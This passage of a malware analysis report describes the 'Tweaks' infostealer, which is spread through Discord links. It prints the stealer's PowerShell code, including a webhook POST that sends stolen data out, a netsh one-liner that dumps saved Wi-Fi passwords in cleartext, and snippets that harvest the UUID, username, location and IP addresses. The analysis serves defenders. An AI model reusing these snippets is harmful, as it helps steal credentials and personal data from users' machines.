Technical Analysis

The following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.

Case Study 1

1. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:

"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
   "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"

The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.

2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below:

“$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”

The code sample above is also shown in Figure 5 below.

Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.

3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user’s location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:

"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;" 
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$country = $ipInfo.country;" ^
"$region = $ipInfo.region;" ^
"$city = $ipInfo.city;" ^
"$location = $ipInfo.loc;"

The code sample above, along with the user’s location and username, are shown in Figure 6 below.

Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.

4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.

The former values are collected using the following Powershell code:

"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"

The latter values are collected with the code shown in Figure 7 below.

Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.

Case Study 2

In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.

The malware creates a folder in the Temp directory, C:Users<user_name>AppDataLocalTempF9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.

Figure 8: The process tree of the Tweaks EXE file.

The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.